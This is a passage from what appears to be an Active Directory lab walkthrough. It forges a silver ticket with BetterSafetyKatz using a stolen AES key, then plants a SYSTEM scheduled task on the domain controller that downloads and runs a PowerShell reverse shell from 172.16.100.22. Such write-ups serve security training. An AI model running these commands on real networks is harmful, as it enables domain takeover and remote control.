Now since we have the secrets of the DC let’s forge a silver ticket

.\\BetterSafetyKatz.exe '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /service:HOST /target:dcorp-dc.dollarcorp.moneycorp.local /aes256:b6c36a42af31a2b6dc52c974a55cc85fdc044d4c9cccf69dfd60d265b4f3befd /startoffset:0 /endin:600 /renewmax:10080 /id:500 /ptt"' "exit"

Now let’s list the Tickets

klist

Now let’s create a Scheduled Task to give me a Reverse Shell

schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'IEX(New-Object System.Net.WebClient).DownloadString(''<http://172.16.100.22/Invoke-PowerShellTcp.ps1>''')'"